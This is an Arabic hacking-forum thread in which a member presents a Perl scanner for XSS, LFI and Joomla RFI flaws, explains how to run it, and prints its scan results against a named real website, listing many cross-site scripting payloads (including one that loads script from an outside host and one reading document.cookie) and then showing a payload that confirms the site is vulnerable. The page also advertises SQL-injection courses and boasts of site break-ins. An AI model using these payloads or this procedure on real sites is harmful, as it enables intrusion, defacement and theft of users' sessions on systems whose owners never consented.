1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ سكربت ] بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

الموضوع في 'قسم الأدوات' بواسطة GO HacKer, بتاريخ ‏19 مارس 2014.

كاتب الموضوع : GO HacKer المشاهدات : 730 الردود : 4 ‏19 مارس 2014
حالة الموضوع:
مغلق
  1. غير متصل

    GO HacKer
    DeveloPer Plus

    عضو منذ:
    ‏16 يوليو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:


    السلام عليكم ورحمه الله وبركاتة

    سكربت بيرل للبحث عن ثغرات

    XSS , LFI , Joomla RFI

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    [ شرح مبسط ]

    ناخذ اكواد السكربت ونفتح تكست ونلصق الاكواد فيه ونحفضه ب صيغه pl
    مثال p.pl
    ونحفضه ف اي مكان ، عن نفسي حفضته في القرص C

    [​IMG]

    [ 1 ] هو الثغرات المراد البحث عنهاَ
    [ 2 ] نضع رقم الثغره ك مثال انا اخترت رقم 1 الي هي XSS
    [ 3 ] نضع الموقع المراد فحصه بدون القيمه او ب القيمه لا مانع
    ثم انتر :{w}:

    [​IMG]

    [ 4 ] وبعد انتهاء الفحص ، نحفظه ب صيغه txt
    ومرات ينحفظ تلقائياََ
    لكن لمن تواجهه مشكله في حفظ عمله البحث
    يعمل ك التالي
    كمثال في الصوره الثانيه : انا حفظته xxs2.txt

    C:/>xss2.txt
    المسار الي حفظنا فيه
    اسم المستند
    الصيغه

    ثم نتجه ل القرص C
    ينجد المستند ب اسم xss2
    او ب اسم All

    نفتح المستند

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58='><script>alert(document.cookie)</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58&lt;script&gt;alert('Hacked by TheShow youtube.com/theshowinglok');&lt;/script&gt   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58a?<script>alert('Hacked by TheShow youtube.com/theshowinglok')</script>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/Hacked by TheShow youtube.com/theshowinglok/alert(a.source)</SCRIPT>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58%3Cscript%3Ealert('Hacked by TheShow')%3C/script%3E   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert(String.fromCharCode(56,56,44,56,51,44,56,51))>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<IMG SRC=javascript:alert('Hacked by TheShow')>   =>   NOT FOUND XSS Vulnerability 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT>a=/G3n3Rall/alert(a.source)</SCRIPT>   =>   XSS Vulnerability FOUND 


    http://www.stevenholl.com/project-detail.php?id=58<SCRIPT SRC=http://g3n3rall-blackhat.persiangig.com/XSS.JS?<B>   =>   NOT FOUND XSS Vulnerability
    بعد ما نفتح المستند بنجد كلمتين في كل سطر

    XSS Vulnerability FOUND
    تم العثور على ثغره امنيه XSS

    NOT FOUND XSS Vulnerability
    لم يتم العثور على ثغرة أمنية XSS

    طيب ناخذ الرابط الي بعده كلمه XSS Vulnerability FOUND

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58<CeNTer>G3n3Rall</CeNTer> => XSS Vulnerability FOUND
    انصح ب استبدال

    كود PHP:
    <CeNTer>G3n3Rall</CeNTer>
    بـ !!:{

    كود PHP:
    "<>'<script>alert(0)</script>
    ليصبح الرابط بهذا الشكل

    كود PHP:
    http://www.stevenholl.com/project-detail.php?id=58"<>'<script>alert(0)</script>
    مصاب وظهر لنا رساله التنبيه 1


    وفقنا الله وياكم لما يحب ويرضى :{11}:
     


    جاري تحميل الصفحة...
  2. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    مشكور عزيزي ...استمر . )5:"
     


  3. غير متصل

    القناص
    DeveloPer Plus

    عضو منذ:
    ‏8 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    بارك الله فيك يا غالي ..
     


  4. غير متصل

    Mr.FriezA
    V • I • P

    عضو منذ:
    ‏10 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    22
    نقاط الجائزة:
    الجنس:
    ذكر
    الإقامة:

    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    الله يوفقك وشكرا على اﻻداه يابطل:rolleyes:
     


  5. غير متصل

    [ بارود الهكر ]
    rank
    Developer

    عضو منذ:
    ‏5 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: بيرل للبحث عن ثغرات XSS , LFI , Joomla RFI

    سلمت يمنيك والله رائع
    شكرا لك وبارك الله بك
    دومك مميز اخي
    تقبل تحيتي​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...